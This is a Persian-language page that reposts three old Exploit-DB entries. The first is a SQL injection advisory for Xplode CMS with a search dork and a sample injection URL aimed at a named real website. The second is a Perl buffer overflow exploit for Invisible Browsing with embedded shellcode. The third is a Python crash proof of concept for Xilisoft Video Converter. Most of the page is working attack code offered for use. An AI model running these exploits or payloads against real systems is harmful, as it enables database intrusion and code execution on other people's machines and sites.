۲۶
بهمنXplode CMS – ‘wrap_script’ SQL Injection
|
۱ ۲ ۳ ۴ ۵ ۶ ۷ ۸ ۹ ۱۰ ۱۱ ۱۲ ۱۳ ۱۴ ۱۵ ۱۶ ۱۷ ۱۸ ۱۹ ۲۰ ۲۱ ۲۲ ۲۳ ۲۴ ۲۵ ۲۶ ۲۷ ۲۸ ۲۹ |
#--------------------------------------------------------------------------------------------- # scriptname: Xplode Cms # # Xplode SQL Injection Vulnerabilities # # Author: PLATEN # # contact: PLATEN.Secure[at]Gmail.com dork: "Powered by Xplode CMS" #---------------------------------------------------------------------------------------------- ===[ SQL ]=== http://۱۲۷.۰.۰.۱/module_wrapper.asp?wrap_script=[sql] example & demo: http://www.snowawards.co.uk/module_wrapper.asp?wrap_script=1' and 1=convert(int,@@version)-- #---------------------------------------------------------------------------------------------- # milw0rm.com [2009-04-08] |
سورس: https://www.exploit-db.com/exploits/8373
۱۱
بهمنInvisible Browsing 5.0.52 – ‘.ibkey’ Local Buffer Overflow
|
۱ ۲ ۳ ۴ ۵ ۶ ۷ ۸ ۹ ۱۰ ۱۱ ۱۲ ۱۳ ۱۴ ۱۵ ۱۶ ۱۷ ۱۸ ۱۹ ۲۰ ۲۱ ۲۲ ۲۳ ۲۴ ۲۵ ۲۶ ۲۷ ۲۸ ۲۹ ۳۰ ۳۱ ۳۲ ۳۳ ۳۴ ۳۵ ۳۶ ۳۷ ۳۸ ۳۹ ۴۰ |
#!/usr/bin/perl print qq( ############################################################ ## Iranian Pentesters Home ## ## Www.Pentesters.Ir ## ## PLATEN -[ H.jafari ]- ## ## Invisible Browsing 5.0.52 (.ibkey) Local BoF Exploit ## ## bug found & exploited by: PLATEN ## ## E-mail && blog: ## ## hjafari.blogspot.com ## ## platen.secure[at]gmail[dot]com ## ## Greetings: Cru3l.b0y, b3hz4d, Cdef3nder ## ## and all members in Pentesters.ir ## ############################################################ ); # Note: I just test this version $junk ="\x41"x ۵۰۰۰; $ret = "\x93\x43\x92\x7c"; $nop = "\x90" x ۵۰; # win32_exec - Size=160 #EXITFUNC=seh CMD=calc #Encoder=PexFnstenvSub http://metasploit.com $shellcode = "\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x38". "\x78\x73\x8a\x83\xeb\xfc\xe2\xf4\xc4\x90\x37\x8a\x38\x78\xf8\xcf". "\x04\xf3\x0f\x8f\x40\x79\x9c\x01\x77\x60\xf8\xd5\x18\x79\x98\xc3". "\xb3\x4c\xf8\x8b\xd6\x49\xb3\x13\x94\xfc\xb3\xfe\x3f\xb9\xb9\x87". "\x39\xba\x98\x7e\x03\x2c\x57\x8e\x4d\x9d\xf8\xd5\x1c\x79\x98\xec". "\xb3\x74\x38\x01\x67\x64\x72\x61\xb3\x64\xf8\x8b\xd3\xf1\x2f\xae". "\x3c\xbb\x42\x4a\x5c\xf3\x33\xba\xbd\xb8\x0b\x86\xb3\x38\x7f\x01". "\x48\x64\xde\x01\x50\x70\x98\x83\xb3\xf8\xc3\x8a\x38\x78\xf8\xe2". "\x04\x27\x42\x7c\x58\x2e\xfa\x72\xbb\xb8\x08\xda\x50\x88\xf9\x8e". "\x67\x10\xeb\x74\xb2\x76\x24\x75\xdf\x1b\x12\xe6\x5b\x78\x73\x8a"; open(fhandle,'>>expl.ibkey'); print fhandle $junk.$ret.$nop.$shellcode; close(fhandle); print "\n [+] File created successfully: expl.ibkey \n"; # milw0rm.com [2009-09-14]</code> منبع: <a href="https://www.exploit-db.com/exploits/9655">https://www.exploit-db.com/exploits/9655</a> |
۱۰
بهمنXilisoft Video Converter Wizard – ‘.yuv’ Stack Buffer Overflow
|
۱ ۲ ۳ ۴ ۵ ۶ ۷ ۸ ۹ ۱۰ ۱۱ ۱۲ ۱۳ ۱۴ ۱۵ ۱۶ ۱۷ ۱۸ ۱۹ ۲۰ ۲۱ ۲۲ ۲۳ ۲۴ ۲۵ ۲۶ ۲۷ ۲۸ ۲۹ ۳۰ ۳۱ ۳۲ ۳۳ ۳۴ ۳۵ |
source<span class="token punctuation">:</span> http<span class="token punctuation">:</span><span class="token operator">//</span>www<span class="token punctuation">.</span>securityfocus<span class="token punctuation">.</span>com<span class="token operator">/</span>bid<span class="token operator">/</span><span class="token number">38854</span><span class="token operator">/</span>info Xilisoft Video Converter <span class="token keyword">is</span> prone to a stack<span class="token operator">-</span>based <span class="token builtin">buffer</span><span class="token operator">-</span>overflow vulnerability because the application fails to perform adequate boundary checks on user<span class="token operator">-</span>supplied <span class="token builtin">input</span><span class="token punctuation">.</span> Attackers may leverage this issue to execute arbitrary code <span class="token keyword">in</span> the context of the application<span class="token punctuation">.</span> Failed attacks will cause denial<span class="token operator">-</span>of<span class="token operator">-</span>service conditions<span class="token punctuation">.</span> <span class="token comment">#! /usr/bin/python</span> <span class="token comment">#</span> <span class="token comment"># Xilisoft Video Converter(.yuv file) Stack buffer Overflow Poc</span> <span class="token comment"># Homepage: www.xilisoft.com</span> <span class="token comment"># #############################################################################</span> <span class="token comment"># Credit : ItSecTeam</span> <span class="token comment"># mail : Bug@ItSecTeam.com</span> <span class="token comment"># Web: WwW.ITSecTeam.com</span> <span class="token comment"># Forum: WwW.forum.itsecteam.com</span> <span class="token comment"># Exploit Coded by: hoshang jafari a.k.a (PLATEN) @ ItSecTeam</span> <span class="token comment"># Special Tanks : M3hr@n.S - B3hz4d - Cdef3nder</span> <span class="token comment"># #############################################################################</span> <span class="token comment"># Bug: Integer Division By Zero</span> <span class="token comment"># Tested in : Windows XP SP3 EN</span> <span class="token comment"># Tested version : 3 = Crash</span> <span class="token comment"># Usage: ./Xilisoft-poc.py</span> <span class="token comment"># #############################################################################</span> <span class="token comment"># ۱۰۲DFDAB: Integer divide by zero (exc.code c0000094, tid 2908)</span> <span class="token comment"># EAX 00000000 ECX 00000000 EBX 00000001 ESP 000E629C EBP 025B3270</span> <span class="token comment"># ESI 00000000 EDI 00000000 EIP 102DFDAB avcodec.102DFDAB</span> <span class="token keyword">try</span><span class="token punctuation">:</span> <span class="token builtin">file</span><span class="token operator">=</span><span class="token builtin">open</span><span class="token punctuation">(</span><span class="token string">"Xilisoft-poc.yuv"</span><span class="token punctuation">,</span><span class="token string">'w'</span><span class="token punctuation">)</span> Buff <span class="token operator">=</span> <span class="token string">"\x41"</span> <span class="token operator">*</span><span class="token number">۵۰۰۰۰۰</span> <span class="token builtin">file</span><span class="token punctuation">.</span>write<span class="token punctuation">(</span> Buff <span class="token punctuation">)</span> <span class="token builtin">file</span><span class="token punctuation">.</span>close<span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token keyword">print</span> <span class="token punctuation">(</span><span class="token string">"[+] File created successfully: Xilisoft-poc.yuv"</span> <span class="token punctuation">)</span> <span class="token keyword">except</span><span class="token punctuation">:</span> <span class="token keyword">print</span> <span class="token string">"[-] Error cant write file to system\n"</span> |
منبع: https://www.exploit-db.com/exploits/33775
